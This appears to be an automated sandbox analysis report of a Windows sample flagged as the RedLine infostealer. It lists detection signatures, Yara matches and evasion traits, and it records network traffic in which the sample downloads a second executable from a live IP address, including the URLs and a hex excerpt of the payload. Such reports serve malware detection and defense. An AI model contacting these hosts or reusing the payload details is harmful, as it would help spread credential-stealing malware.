Edit tour

Windows Analysis Report
BaGkRDSifo.exe

Overview

General Information

Sample name:	BaGkRDSifo.exe renamed because original name is a hash value
Original sample name:	3b8f605388479cd9296e0be1ea9d1f60.exe
Analysis ID:	1448043
MD5:	3b8f605388479cd9296e0be1ea9d1f60
SHA1:	4608fd9d55cae50eaa9379b02373afea15572eae
SHA256:	d550397a71e1fc77be3460d1742f1df63d43ba74487a10ec96befc1c768768bc
Tags:	32exeRedLineStealer
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

BaGkRDSifo.exe (PID: 180 cmdline: "C:\Users\user\Desktop\BaGkRDSifo.exe" MD5: 3B8F605388479CD9296E0BE1EA9D1F60)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
BaGkRDSifo.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\STHealthUpdate.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1A 88 44 24 2B 88 44 24 2F B0 49 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.BaGkRDSifo.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.BaGkRDSifo.exe.6580000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.BaGkRDSifo.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A3 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.BaGkRDSifo.exe.5b80f32.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.BaGkRDSifo.exe.5b80000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.BaGkRDSifo.exe.45fff90.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: BaGkRDSifo.exe

Virustotal: Detection: 28%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\STHealthUpdate.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BaGkRDSifo.exe

Joe Sandbox ML: detected

Source: BaGkRDSifo.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown	Network traffic detected: HTTP traffic on port 9876 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 9876
Source: unknown	Network traffic detected: HTTP traffic on port 9876 -> 49701

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.BaGkRDSifo.exe.6580000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BaGkRDSifo.exe.5b80f32.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BaGkRDSifo.exe.5b80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BaGkRDSifo.exe.45fff90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.7:49701 -> 47.104.173.216:9876

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 27 May 2024 11:10:41 GMTAccept-Ranges: bytesETag: "f599508326b0da1:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 27 May 2024 13:23:01 GMTContent-Length: 243200Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 10 84 2d 2c 71 ea 7e 2c 71 ea 7e 2c 71 ea 7e 32 23 7f 7e 3f 71 ea 7e 0b b7 91 7e 2b 71 ea 7e 2c 71 eb 7e 5c 71 ea 7e 32 23 6e 7e 1c 71 ea 7e 32 23 69 7e a2 71 ea 7e 32 23 7b 7e 2d 71 ea 7e 52 69 63 68 2c 71 ea 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 69 54 66 00 00 00 00 50 45 00 00 4c 01 04 00 74 a5 00 50 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 98 01 00 00 1a 02 00 00 00 00 00 2f cd 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 fb 3b 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 15 02 00 50 00 00 00 00 60 02 00 8c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b1 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0d 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 97 01 00 00 10 00 00 00 98 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b4 6d 00 00 00 b0 01 00 00 6e 00 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 30 00 00 00 20 02 00 00 16 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 95 01 00 00 60 02 00 00 96 01 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876

Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216
Source: unknown	TCP traffic detected without corresponding DNS query: 47.104.173.216

Source: global traffic	HTTP traffic detected: GET /server.txt HTTP/1.1Host: 47.104.173.216:9876Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /STHealthUpdate.exe HTTP/1.1Host: 47.104.173.216:9876

Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://11.65.9.11:9082/jkda/webservice/DPService#
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.104.173.216:
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.104.173.216:9876
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.104.173.216:9876/STHealthUpdate.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.104.173.216:9876/server.txt
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webservice
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://com.wondersgroup.jkda.application.modules.webserviceTU
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/$
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/AppliyUpLoadT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/AppliyUpLoad_BoErChengT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/ChangestatusT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/CheckUpLoadReportFromBytesT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownLoadReportFormIDT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownLoadReportFormPDFByAccountPassWordT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownLoadReportForm_PKIT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadBarCodeCancelT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/DownloadBarCodeFlagT
